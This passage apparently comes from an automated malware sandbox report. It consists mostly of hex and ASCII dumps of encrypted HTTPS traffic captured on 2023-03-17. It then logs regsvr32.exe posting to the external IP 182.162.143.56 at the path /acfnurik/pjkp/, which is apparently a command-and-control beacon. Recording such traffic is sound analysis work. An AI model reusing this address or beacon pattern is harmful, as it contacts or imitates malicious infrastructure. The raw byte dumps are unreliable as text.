1e ae f0 06 c4 83 aa ea 62
                                                                                                                                                                                                                  Data Ascii: Btp}|a-.$QItlOUs9Eg0u],C4HO0bq^c7D\OU'qg5\X.O4,G9?*4$8E!QqPk!-_fF0 !d4z-x<IpD^++.!-@&E)K$ !-Tnyp-K/s|Ur\m|'&bA@l=VM%(b
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC176INData Raw: 0d 0a
                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC176INData Raw: 34 30 30 30 0d 0a 70 8e 94 63 5d 32 2d 53 28 e0 28 21 7e a0 b1 95 a0 fb aa 66 95 51 fd b3 3e e1 65 39 da 0f 2c bf d2 49 a1 41 ea a4 e4 93 50 ec 84 de 42 da 65 73 e4 4c 27 44 6d 1c e0 82 50 6c 7c f9 49 41 70 09 8e 39 da 0f 2c c1 7e ba ac 45 79 c3 3c 7a 53 ad 08 2f b3 b2 f9 81 ec 6c 27 aa 04 7a 62 8e b4 68 f0 0d 24 20 76 c1 fa aa 14 5a bd 0d d3 a5 2e 18 f4 4c 35 7a 92 43 5d 32 2f 16 30 02 ec 7c 27 aa 3c 7a 3d a3 71 c7 f0 3d 24 40 ff 68 30 a0 24 5a b0 74 ba b7 e0 45 79 ed 70 9e 94 63 5d 35 d7 53 28 ea 28 21 e5 94 c6 9f c0 06 2d 18 7d 87 c3 d8 79 70 af 14 ae bd b5 3d 2b e7 fd a6 47 ef 70 62 da 63 99 f0 01 83 28 6a 65 39 fe 46 a1 69 c0 06 e5 f9 6c 78 3c d8 49 b8 b1 3c 51 42 f3 0d 2b f5 44 00 61 e5 78 62 2a 3a 1f ac 2f 16 30 45 ec 7c 27 aa 34 7a 61 04 ca 8b b0
                                                                                                                                                                                                                  Data Ascii: 4000pc]2-S((!~fQ>e9,IAPBesL'DmPl|IAp9,~Ey<zS/l'zbh$ vZ.L5zC]2/0|'<z=q=$@h0$ZtEypc]5S((!-}yp=+Gpbc(je9Filx<I<QB+Daxb*:/0E|'4za
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC184INData Raw: a0 fb e8 33 01 67 fd b3 3f e1 a5 99 52 42 34 c3 be da 68 00 61 93 d4 51 99 9e 08 a6 8b e9 f9 82 66 f3 fe c2 74 eb cc fb 36 74 71 f9 b9 e1 3f 68 30 45 4c 42 34 c9 86 da 68 00 61 35 b1 79 53 e1 c0 87 47 53 28 21 c1 39 3f aa c4 d2 42 43 35 25 b1 47 e9 d2 b1 d8 33 21 51 b5 d5 63 f9 b3 82 03 ab a5 dc 7c da ab f5 34 44 53 a9 de d5 3a 3f 2b 3f 9c aa 41 71 ff fc c8 3f 59 3c e3 a5 99 52 42 34 c3 be a2 68 00 61 8c c7 3f ac d9 ce ff cf d6 e0 68 65 39 14 e3 17 e1 3d 0f 55 28 04 7d 5a d0 48 24 50 e6 d4 82 37 48 33 85 85 00 61 28 b8 3e 77 46 c4 82 84 50 28 6b 89 05 38 32 f0 e7 81 40 35 74 55 dd c3 a6 bd dd f0 22 51 42 95 eb 34 7b ac 85 d1 67 35 7a e6 a9 45 37 2f d6 98 68 65 39 60 a2 f4 d2 42 43 35 f5 f4 c8 3f 59 3c 4e 87 21 51 c3 81 f8 30 62 6b 71 3a 4e e9 f1 de 96 46
                                                                                                                                                                                                                  Data Ascii: 3g?RB4haQft6tq?h0ELB4ha5ySGS(!9?BC5%G3!Qc|4DS:?+?Aq?Y<RB4ha?he9=U(}ZH$P7H3a(>wFP(k82@5tU"QB4{g5zE7/he9`BC5?Y<N!Q0bkq:NF
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC192INData Raw: 0d 0a
                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC192INData Raw: 34 30 30 30 0d 0a fe 78 e2 ba 8c 3a f5 ea 98 64 c8 0e 42 f5 04 0f df 3e d9 81 bb 64 26 cb 71 5f f4 27 1c 76 0f 64 35 c2 f6 67 5f 93 cf 1e 5f 9c 84 12 f5 fa 98 61 8b 82 dc 71 f8 35 4b d8 49 1f e1 42 a8 da bf 0d 44 eb 2e 2b a6 21 42 d0 07 26 45 f6 29 24 25 ea 28 4e ca b4 85 8c c0 36 42 ea a5 58 c6 d2 79 1f b9 64 62 85 71 3f fd 45 6b 00 20 ef f4 f1 1e 51 b2 d6 85 b9 2c e2 30 4e be 5e 06 5c 7f 03 dd ff 34 0f b5 1c 3f af 75 56 fc ae 34 48 b2 27 1c 26 a4 9b ca bb 3e 51 46 f6 29 24 2c ea 10 4e 46 6b 4c 74 ca 06 42 fd 34 6b fb 1c 4b 80 ff 21 51 03 bf 89 b8 2f 1c f7 80 a5 df 7e da 73 32 5c 01 24 5c e2 20 4e be 6e 06 50 01 bc ca f5 04 0f 7a 29 a5 f6 bb 64 26 cb 71 4f f4 27 1c bf 34 64 35 3b d8 e7 c4 42 33 32 9e d4 cb b8 4a 5c 34 3e ab 8e b4 31 06 e9 90 59 3c e9 45
                                                                                                                                                                                                                  Data Ascii: 4000x:dB>d&q_'vd5g__aq5KIBD.+!B&E)$%(N6BXydbq?Ek Q,0N^\4?uV4H'&>QF)$,NFkLtB4kK!Q/~s2\$\ NnPz)d&qO'4d5;B32J\4>1Y<E
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC200INData Raw: 3c 56 b8 c1 34 21 51 7f 40 08 33 62 64 84 21 66 35 7a 6e 5f ad 37 44 5c ac 40 67 39 3f 16 83 8d 41 43 3a f1 0d 7c 3c 59 fb 2d 33 a6 97 42 34 23 76 61 40 89 24 67 8d 73 98 1b c8 b6 01 50 96 87 9a c6 be 6e 72 f2 d1 bc ca f5 34 7b bf b3 3c 68 b1 54 52 3c f4 69 33 a5 2e ff 99 25 35 7a d2 63 ba c1 b7 53 28 aa 00 c6 36 aa 34 9d 25 7c 35 74 f0 3d c3 23 66 97 cf a0 24 bd ea 3d 58 60 ac 45 6a 18 c1 7a 53 ad 08 3c b3 b2 e9 81 60 b0 6a 20 f0 17 4a 1a 31 d5 e5 f9 49 52 53 68 91 b5 96 07 3b cd 03 62 6b 8b 24 6b b8 76 d3 af 08 38 c5 26 27 31 8b 38 3f ec 34 99 18 53 35 74 f0 3d c7 9b 83 68 30 a0 1c b9 cb 3f ac ad aa 65 9a 60 b4 0f a8 d4 cb c0 bd 94 6d 78 14 77 3f 2b f0 2f 52 df db 13 76 f9 49 4a 49 35 57 26 96 07 c3 eb 6b 62 6b 6b 24 93 7f f3 16 d1 fd fe 06 45 9a e0 28
                                                                                                                                                                                                                  Data Ascii: <V4!Q@3bd!f5zn_7D\@g9?AC:|<Y-3B4#va@$gsPnr4{<hTR<i3.%5zcS(64%|5t=#f$=X`EjzS<`j J1IRSh;bk$kv8&'18?4S5t=h0?e`mxw?+/RvIJI5W&kbkk$E(
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC208INData Raw: 0d 0a
                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC208INData Raw: 34 30 30 30 0d 0a e3 a0 f4 22 40 43 35 fd f4 38 3d 59 3c 20 bd 24 2d 1a 34 48 7b eb ee 98 61 64 35 bd d6 66 44 37 44 5d 67 6b 65 b8 8a 6b 70 62 41 34 3b 1c 3a b9 91 19 3d 68 30 23 90 ef 74 49 33 62 66 81 ec 24 34 7a 53 93 a8 c0 f2 d2 9d 2b 64 39 3f ba 8e 95 f7 c8 b0 34 70 78 3c d0 b9 28 31 21 51 0a b9 4d b3 79 94 ff 29 ed b0 7a 52 26 45 7f c9 56 1e af 9a c6 77 a2 35 46 21 84 b0 34 70 78 3c 14 0a 68 30 e0 fc 02 35 48 33 6f e8 b5 21 65 35 7a 36 ad c0 77 45 53 28 e2 e0 79 3e 2b 71 a5 c4 03 34 74 71 0e 94 59 3c e9 bd 61 50 42 34 8f 77 2a 53 c1 c4 24 34 7a 53 29 c4 82 04 52 28 6b 01 b9 44 5d fa e7 01 42 35 74 f8 fd 7c 58 3c 68 78 ac 54 b3 2f 49 33 2a e2 45 31 2c b8 7f 65 31 45 37 0c da 6d 83 2d b4 3a cc 00 62 41 0b bc 31 f9 30 b1 5c 5c 86 cf de 19 cb 70 6c 73
                                                                                                                                                                                                                  Data Ascii: 4000"@C58=Y< $-4H{ad5fD7D]gkekpbA4;:=h0#tI3bf$4zS+d9?4px<(1!QMy)zR&EVw5F!4px<h05H3o!e5z6wES(y>+q4tqY<aPB4w*S$4zS)R(kD]B5t|X<hxT/I3*E1,e1E7m-:bA10\\pls
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC216INData Raw: e8 a8 dc cb 99 23 d2 8d dd 6b 23 fb 17 02 05 19 17 ac d7 ea 11 1d 7f 14 b3 9f be 84 71 50 09 9e aa 59 3c e9 7c 05 29 60 63 73 4e e3 1f 24 19 46 6b 98 a2 a7 31 13 3c 4c 7f b5 e9 b2 7b 0f 09 e9 05 67 75 9c 2f 20 c3 a6 74 e1 35 6e 32 43 34 0c b8 a9 2e 33 a1 2c be ac d8 e9 0d bc 18 77 48 23 ee 4d 1b 43 39 e1 85 13 6a 3c 8e 98 f0 95 74 eb dc 09 96 06 10 40 89 d3 6b 00 a6 20 11 76 31 09 45 37 83 17 0c 7b 11 f5 3f 2b b6 26 65 73 97 0c 71 78 70 d2 fd a9 54 05 61 48 bf 0c 17 52 e6 14 21 a5 d7 78 da 72 61 07 95 37 0c 5b e4 7d 1b 1b 34 a5 41 43 b4 00 55 48 66 06 01 45 bb 65 75 72 bd 0c 17 52 ac 44 45 24 8c 86 33 0b 82 33 60 bc 52 de 7c fe 7b 0f 49 7c 11 de ba b3 35 5c 74 b7 46 4d 36 e6 15 66 04 f3 0c 62 6b 81 25 40 05 5a 03 26 45 b6 00 77 18 27 7e c6 c0 aa 05 46 71
                                                                                                                                                                                                                  Data Ascii: #k#qPY<|)`csN$Fk1<L{gu/ t5n2C4.3,wH#MC9j<t@k v1E7{?+&esqxpTaHR!xra7[}4ACUHfEeurRDE$33`R|{I|5\tFM6fbk%@Z&Ew'~Fq
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC224INData Raw: 0d 0a
                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC224INData Raw: 34 30 30 30 0d 0a 3d 3c f8 04 18 49 69 20 bd 8d 75 12 c8 b7 cc 2a ea ec d1 60 35 7a 1a ad 9c 7f cf aa c0 1c 4b 39 3f ec 35 46 01 1c 5a 74 71 bf 78 7d 78 10 74 21 51 71 f4 00 ba 26 4f 48 a6 20 11 46 60 3b 45 37 08 de 64 4f 35 f8 53 0f 4d 6c c0 37 11 48 a5 38 38 59 fb 2c 14 15 14 13 34 48 f2 0e 4f 34 63 e5 79 5e 67 68 c3 dc fe 92 4c 4f 51 31 be 67 55 56 bb c5 1b fa f0 0c 18 6d d2 29 8e ce 96 06 10 70 69 b5 6b 00 e0 28 11 42 4a 60 ca f5 c5 27 0c 53 79 ce bf e9 b6 26 65 73 88 59 71 78 57 1d 18 58 61 a8 15 66 04 c9 7f 46 5b b0 b8 67 06 fb 27 02 75 d3 5d fb 25 ea 11 1d 0f d0 5b c7 7f c8 71 50 41 3c b7 1d 18 50 bb 75 75 76 bf 04 17 5e e2 44 45 4c f2 3e 77 06 7d 37 44 53 c0 5a 53 39 3f ec 35 46 75 65 07 74 71 c0 f7 32 14 c7 bb 6d 75 76 78 c5 7e f2 9c e1 4a ae 8d
                                                                                                                                                                                                                  Data Ascii: 4000=<Ii u*`5zK9?5FZtqx}xt!Qq&OH F`;E7dO5SMl7H88Y,4HO4cy^ghLOQ1gUVm)pik(BJ`'Sy&esYqxWXafF[g'u]%[qPA<Puuv^DEL>w}7DSZS9?5Fuetq2muvx~J
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC232INData Raw: 8b bb ec 64 35 f1 1e c6 b2 d6 6f 99 f9 82 66 f3 fe c2 77 eb 0c a3 b4 31 91 4d 6f a6 c3 a9 55 c1 52 29 71 a8 19 eb 2e e0 e0 11 d5 30 d6 38 ba 7e cf 55 60 e2 21 1d 0f a0 34 82 c8 07 11 5c fa 3d d8 1d b7 25 d8 65 da 07 d8 09 b8 34 63 48 ea 29 cd f3 17 02 65 df f8 eb d7 94 a2 7c d7 8f d7 62 41 82 50 9c 7a f3 f4 e3 3d 68 30 21 d0 07 dc da b7 62 6b bf fa 50 35 7a 92 4b ad 27 c5 26 c0 5e 60 39 3f a0 34 8a 7a 8b 3a 30 83 91 ea a7 c3 97 8f e2 1a 42 34 a1 e2 9c 94 ff a6 21 d1 20 0a 26 45 b6 01 b7 6f 42 9a c6 be 6e 95 48 2b bc ca b5 1c 9c 36 d8 49 8c 62 21 6b 42 f3 0d db 83 a4 00 61 e5 70 92 b5 1b 45 37 c5 16 c0 65 80 39 3f aa 04 8a 8e 55 08 5a f0 0d d4 8f d6 55 1e aa 14 aa bf 0d d7 8a 55 59 61 64 f2 3f bf 59 73 37 44 1b a3 b3 2d b4 7a d3 b0 07 ad 53 7d fd 35 5c 04
                                                                                                                                                                                                                  Data Ascii: d5ofw1MoUR)q.08~U`!4\=%e4cH)e|bAPz=h0!bkP5zK'&^`9?4z:0B4! &EoBnH+6Ib!kBapE7e9?UZUUYad?Ys7D-zS}5\
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC240INData Raw: 0d 0a
                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC240INData Raw: 34 30 30 30 0d 0a fb 2c 14 09 e3 d0 34 48 f4 26 4f 2c ed 84 35 7a 94 62 61 07 6e 93 28 6b 2d bc ff 5e 2e a5 05 67 15 8c f3 78 3c e0 d6 80 b3 8b 10 fb 8d 4a 36 f5 ea 44 45 44 b1 5e ac d9 c4 73 60 73 4b 3c 9a c6 be 67 55 42 b7 a6 7f 49 f0 0c 18 79 9c a6 ca de 96 06 10 6c 1b f1 6b 00 e0 28 11 5e 94 c3 cb 85 c5 27 0c 4f cd 02 b7 99 fa 26 65 67 be 30 55 58 d4 72 c4 96 cf 69 d8 47 b8 4b 32 62 23 8b b6 2c be b1 1b ad 19 13 14 1b ab af 25 66 77 d4 91 ae c8 0f 11 7c 24 30 b7 b5 74 eb dc 41 96 07 c4 b8 3f 62 6b 33 a1 ed 70 8e 94 63 55 9a 6b 53 28 ea 10 29 79 24 3b 98 80 2e 25 7b f0 0d 2c 38 c7 5e 99 aa 14 52 bd 0d df a5 2e 10 7a 81 35 7a d2 63 55 cf 85 ac d7 ea 20 29 ad 56 8e 9d c0 36 25 d9 fc d8 ab d2 79 78 b9 64 b9 85 71 a8 57 47 6b 00 d9 39 74 36 fd ad 08 d7 b3
                                                                                                                                                                                                                  Data Ascii: 4000,4H&O,5zban(k-^.gx<J6DED^s`sK<gUBIylk(^'O&eg0UXriGK2b#,%fw|$0tA?bk3pcUkS()y$;.%{,8^R.z5zcU )V6%yxdqWGk9t6
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC248INData Raw: d8 63 96 bc 11 14 a3 26 aa b0 7b 0f 59 a5 05 67 15 54 71 78 3c b1 c0 be cf de e9 76 77 48 33 8b 7a ff 9e 9b f2 3f 98 43 4a 37 44 eb e3 00 4d 96 b4 66 ba 95 a0 68 ff a5 98 7b f6 98 d5 6d b9 6c 9a 83 59 83 39 a3 06 cb 67 e5 40 b1 86 1f 17 69 c5 26 e3 90 41 63 61 ec 34 a5 2e c0 35 74 1a 3d fb 0a b5 2d f7 99 68 cc d7 70 b8 2f ac f7 80 a5 df 7e da 73 82 f6 29 94 2a ea 10 fe 29 a0 71 62 86 06 fa d4 2c 78 3c 32 79 a7 12 a8 14 8d b5 3d fc 2e 97 04 61 a3 70 3d 57 4f 45 37 2f 16 6f 31 ec 7c 78 aa 34 25 13 a2 35 74 b0 15 7b 54 57 2d 77 3c d8 07 73 c9 46 25 7d 3e 68 64 be 3f 14 62 ce 7a 8b 17 a3 2e a2 b2 72 e0 f8 26 65 6b 7d fd 2d 5c 1c b1 de df 30 21 e9 e1 21 48 33 8b 38 fe 9e 9b 7d f1 16 c9 0d be 01 5c ef 2e 22 28 cf 2b 71 e3 04 04 b4 38 71 78 bd 1c 7b 06 78 de ae
                                                                                                                                                                                                                  Data Ascii: c&{YgTqx<vwH3z?CJ7DMfh{mlY9g@i&Aca4.5t=-hp/~s)*)qb,x<2y=.ap=WOE7/o1|x4%5t{TW-w<sF%}>hd?bz.r&ek}-\0!!H38}\."(+q8qx{x
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC256INData Raw: 0d 0a
                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC256INData Raw: 34 30 30 30 0d 0a 8c 9a 33 62 aa a5 41 62 35 7a 5f a7 c0 17 42 53 28 dd e6 c6 c0 aa fc 42 47 43 35 a1 c1 76 82 d8 89 48 36 21 51 46 38 6e 8c a5 ee 18 67 64 35 aa 56 26 45 bc c1 4b 2e 6b 65 b4 33 eb 72 ab c8 ce 2d 72 71 78 74 d4 71 fc b1 a4 49 44 34 48 96 81 94 ff a0 c1 2d 7c 53 26 43 b6 f1 4b 2e 6b 65 8f c5 32 71 a5 c4 53 33 74 71 c7 f9 59 3c e9 b5 31 57 42 34 77 b0 9d 94 81 e4 74 33 7a 53 cc b6 c8 bb d2 ad 7b 63 39 3f 49 ec 9d be 82 98 64 77 78 3c 5f bd dd 20 27 51 42 aa b0 ce 61 e0 85 71 62 35 7a da 62 61 77 0c d8 6d f3 2d b0 7b 0f 49 e9 c4 5b 33 74 71 f1 78 7d 0c e3 b5 01 57 42 34 c1 77 46 43 8b e4 4c 33 7a 53 af 01 13 64 bb 62 0d 9b c6 ba eb 7e e7 01 42 35 74 b6 3d bc 62 4f 68 30 99 2c 4e fa 8f b2 2f eb 71 94 14 cf f1 1e a6 b2 d6 fc 56 69 7b 61 f8 d5
                                                                                                                                                                                                                  Data Ascii: 40003bAb5z_BS(BGC5vH6!QF8ngd5V&EK.ke3r-rqxtqID4H-|S&CK.ke2qS3tqY<1WB4wt3zS{c9?Idwx<_ 'QBaqb5zbawm-{I[3tqx}WB4wFCL3zSdb~B5t=bOh0,N/qVi{a
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC264INData Raw: 6d 1c ee 6c 90 a0 3c 1d c8 07 11 54 99 49 4b a7 c3 af 75 56 dc a8 34 48 b2 27 1c fe ce 9b ca 11 16 51 23 be 01 24 43 2e 12 48 b6 6e 06 e9 04 34 b8 78 31 c0 9d f9 9c c8 f1 c0 55 cb 79 3f b2 17 1c d2 41 c6 2d bd 16 89 53 0d 44 53 a3 26 ca ce de ea 9b 67 c8 16 9a f5 04 d7 ca 7b 37 68 f7 64 f6 99 57 48 33 e3 2e a7 09 df 35 7a d2 53 e2 da b1 59 28 ac 20 46 58 42 71 62 c0 06 4a cc bc 78 3c 15 b7 a7 b1 54 2e bc 3d 49 33 e9 2e 7f 25 ef 70 dd d8 73 ea de 19 a8 d7 94 a2 7c 48 5b 78 62 41 82 50 03 7f 13 79 2e 37 e1 75 56 3a 07 43 20 ba 27 1c 81 14 13 a5 99 7d ad ce 72 33 bb 50 40 9a c6 f8 6e 06 90 bd 43 35 f5 34 0f a4 f5 c3 97 78 aa 89 c3 41 3f f2 8f 29 4d ea 21 42 f3 16 c9 82 72 33 d1 f6 6b 65 f8 52 5c 75 e3 34 34 dc 79 71 78 b7 1c 4b e1 75 d2 96 07 43 df b7 62 6b
                                                                                                                                                                                                                  Data Ascii: ml<TIKuV4H'Q#$C.Hn4x1Uy?A-SDS&g{7hdWH3.5zSY( FXBqbJx<T.=I3.%ps|H[xbAPy.7uV:C '}r3P@nC54xA?)M!Br3keR\u44yqxKuCbk
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC272INData Raw: 0d 0a
                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC272INData Raw: 34 30 30 30 0d 0a 61 2c bc 32 63 6e c0 fe 4b d6 07 69 65 39 87 e8 39 62 41 aa db 89 8e 87 fb 1c 24 01 f6 21 51 83 51 50 38 e3 2e 18 a6 3e ca 85 d2 6b 5d 8c fe dd aa ea 10 21 77 e7 cc e4 86 06 15 e2 c6 78 3c d8 79 48 48 f3 ae bd 8e 08 33 62 6b c1 0c 44 36 fb 26 06 34 53 4d 53 a3 2e 45 b2 7a 33 99 11 32 bc ca 3c f8 7d 7c 26 3c 68 78 a4 91 4d b0 99 32 62 6b b8 3a af 35 7a ba ad b8 c8 bb 94 6d 4b 75 60 3f 2b c9 e7 51 01 3d ff 3c 58 cb b8 84 ed 20 63 59 69 fe 99 da 61 a1 c1 88 61 bc 37 73 e7 28 17 4c d2 65 4b 85 49 49 db f0 17 61 f8 33 00 81 bf 79 41 0f f1 30 21 d0 07 2c 2d 3d 62 6b c1 0c 7c 31 f1 1e 3e b2 d6 6f 99 f9 82 66 f3 fe c2 75 eb 0c 5b f4 19 69 7e bd 2c 24 89 e2 22 51 85 71 60 48 20 6b 00 a0 01 1d 74 d2 63 6d a2 9b 53 28 ea 10 11 46 88 e7 72 86 06 05
                                                                                                                                                                                                                  Data Ascii: 4000a,2cnKie99bA$!QQP8.>k]!wx<yHH3bkD6&4SMS.Ez32<}|&<hxM2bk:5zmKu`?+Q=<X cYiaa7s(LeKIIa3yA0!,-=bk|1>ofu[i~,$"Qq`H ktcmS(Fr
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC280INData Raw: 8e 2a c8 46 c3 10 71 78 78 d2 f3 2c bb e7 19 c9 e7 00 b8 af 27 8d 3d 40 55 33 d8 7d 55 7e cf 38 30 22 ee 4a 1f 62 fa 81 1e 0b ca 94 bd b4 70 d2 e0 21 b9 7a 59 0b bd 23 2b 2b e2 73 41 33 7d f9 bf 76 ce b3 60 f3 28 6b 65 71 b4 97 55 ca 41 43 35 3c fa e4 18 c9 3c 68 30 68 d8 39 c4 c1 77 46 2b 8b e5 40 ad 7a 53 26 cc 73 60 6b a3 ef 41 b1 3f 2b 71 2b c8 18 ed fd 35 5c 14 d2 b8 4c b0 21 51 42 8e 4c 32 62 6b 49 ea 8d 7c f1 a3 af 01 13 64 bb 20 25 9a c6 85 45 e6 9b b2 84 71 50 19 a7 c6 59 3c 80 b2 47 af bd 78 c3 fc 2e e0 c5 db 60 34 7a 53 6e ce fc 0c da 9c 4f e5 39 3f 2b 39 e9 1d 67 55 3c fa 14 18 29 74 e3 44 05 29 0a b7 8c 63 3d 23 ff 81 a8 79 f1 8f 6f cc 6c 4c 1a a1 00 75 70 b6 58 69 2b c8 38 15 35 27 30 bf b5 4c e3 b4 05 b1 42 34 48 7b e9 c7 24 89 64 35 7a 17
                                                                                                                                                                                                                  Data Ascii: *Fqxx,'=@U3}U~80"Jbp!zY#++sA3}v`(keqUAC5<<h0h9wF+@zS&s`kA?+q+5\L!QBL2bkI|d %EqPY<Gx.`4zSnO9?+9gU<)tD)c=#yolLupXi+85'0LB4H{$d5z
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC288INData Raw: 0d 0a
                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC288INData Raw: 34 30 30 30 0d 0a a9 be 01 a7 ef 2e 75 f6 7b 2b 71 e3 34 53 1a 03 a8 63 84 da 82 c8 1f aa 04 52 c3 aa f2 88 68 89 34 74 b4 0f 43 42 87 03 e1 d2 5d 7b fc b9 a7 8e fa 27 51 ca 70 64 b6 3d 1c ff 7d 45 2d e6 14 a2 d5 20 72 59 ac 45 79 b7 6d 99 b5 e1 00 1f a5 3b 82 f9 a2 7c 2f 91 b2 62 41 82 50 64 61 f3 79 49 fd 88 37 a8 14 52 b5 3d 23 3f e2 09 bc ef 70 6a da 63 55 bc 09 4b a3 2e 45 0a f7 6a f8 6a 86 06 25 69 40 78 3c d8 79 78 7e dc 51 42 b5 0d 23 80 35 00 61 0f 70 6a 3e af 00 27 c5 1e 38 89 5b 20 77 aa 04 72 f7 f5 85 3c fa 3d 2c d0 79 78 bb 6c 79 c9 71 a8 00 aa 2a 89 29 60 f2 3f 43 34 73 37 44 92 4d 7b 63 b2 7a 3b fc 6e 81 40 fc fd 3c 68 bd 1c 2c bb 1a de ae c3 71 58 60 7c 94 ff e0 11 25 01 40 de 45 bc 01 43 a1 2e 75 71 bc ef 51 3f 82 8f f9 b8 39 fb d0 71 fb
                                                                                                                                                                                                                  Data Ascii: 4000.u{+q4ScRh4tCB]{'Qpd=}E- rYEym;|/bAPdayI7R=#?pjcUK.Ejj%i@x<yx~QB#5apj>'8[ wr<=,yxlyq*)`?C4s7DM{cz;n@<h,qX`|%@EC.uqQ?9q
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC296INData Raw: fe 8f dd 11 b1 2d a7 68 da 8d f5 a2 35 2a e2 44 45 4c bc 2f dc 6e c8 62 eb d2 5d e4 b7 ae 3d 2b fa 27 ce 07 be 38 55 28 78 d2 79 ef b9 65 75 62 dc 29 4c 9c 94 f7 b9 7f f5 5f e7 e4 45 37 41 3c 08 6b 65 d0 d5 d1 8e 9d 86 07 11 24 c2 a1 3c 59 bd 2c 14 71 ca 15 cb b7 b2 2e 4f 50 db 07 a0 68 d2 62 61 67 fd 1e d7 94 0e 7d 1b 7b 52 eb 05 67 65 f5 05 5c 6c a5 d0 38 ba e6 14 c5 08 8c 33 62 00 45 e6 52 bc 3f d4 9e 7c b6 57 6b a9 26 e2 25 21 eb 76 e3 34 c4 dc 82 9b 7f fb 1c b3 6a 61 21 51 c3 79 c7 e5 26 28 7b e0 11 ba fe 2c 61 3e f0 01 d0 91 f1 65 39 b4 66 f2 95 a0 fb 8a 22 be 76 17 93 ed 81 33 eb 90 ab 32 c1 7e e1 ba 6d e2 ef 78 f9 a4 c7 6e fd 95 ba 2b a1 a4 d0 39 a2 3c e1 08 c8 fa f5 04 fb 1c e5 35 68 bb 64 d2 cb 70 6c 73 2a e6 45 96 2c bc 3e 77 1e ce 72 cb da 6c
                                                                                                                                                                                                                  Data Ascii: -h5*DEL/nb]=+'8U(xyeub)L_E7A<ke$<Y,q.OPhbag}{Rge\l83bER?|Wk&%!v4ja!Qy&({,a>e9f"v32~mxn+9<5hdpls*E,>wrl
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC304INData Raw: 0d 0a
                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC304INData Raw: 31 36 30 30 0d 0a 39 9a 3d 2b 65 8d 41 43 56 87 71 78 48 fa 3e 68 e8 d2 51 42 7c bd 33 62 eb a3 63 64 7d 8f 53 26 19 c1 44 53 78 cb 67 39 63 dd 71 62 3a b4 35 74 6d d8 3e 59 40 9f 30 21 92 ba 34 48 af c1 69 00 a5 9c 35 7a 54 d9 45 37 f4 f0 2a 6b 6d c6 3f 2b c4 9d 41 43 49 d6 73 78 84 a6 3c 68 d1 21 50 42 28 e8 31 62 8f 00 60 64 3c 78 52 26 89 94 46 53 24 69 64 39 9a 2e 70 62 99 e0 37 74 d9 7d 3d 59 28 6e 31 21 bd e1 36 48 27 64 6a 00 c1 63 34 7a af 85 47 37 e4 54 29 6b 27 31 3e 2b 5d c2 43 43 71 7c 70 78 f5 51 3d 68 28 85 53 42 f8 40 32 62 04 0a 60 64 15 de 51 26 35 3d 45 53 a3 60 64 39 6f 8b 73 62 cd 48 34 74 28 75 3d 59 10 cc 32 21 0d 4f 35 48 1a 6c 6a 00 e9 c5 37 7a 7f 28 44 37 1e 5c 29 6b 79 99 3d 2b 2d 6d 40 43 1b 64 70 78 10 f9 3e 68 00 31 50 42 f2
                                                                                                                                                                                                                  Data Ascii: 16009=+eACVqxH>hQB|3bcd}S&DSxg9cqb:5tm>Y@0!4Hi5zTE7*km?+ACIsx<h!PB(1b`d<xR&FS$id9.pb7t}=Y(n1!6H'djc4zG7T)k'1>+]CCq|pxQ=h(SB@2b`dQ&5=ES`d9osbH4t(u=Y2!O5Hlj7z(D7\)ky=+-m@Cdpx>h1PB


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  1192.168.2.749707182.162.143.56443C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                  2023-03-17 08:21:03 UTC310OUTPOST /acfnurik/pjkp/ HTTP/1.1
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                  Host: 182.162.143.56
                                                                                                                                                                                                                  2023-03-17 08:21:04 UTC310INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Fri, 17 Mar 2023 08:20:20 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  2023-03-17 08:21:04 UTC310INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                  Start time:09:19:40
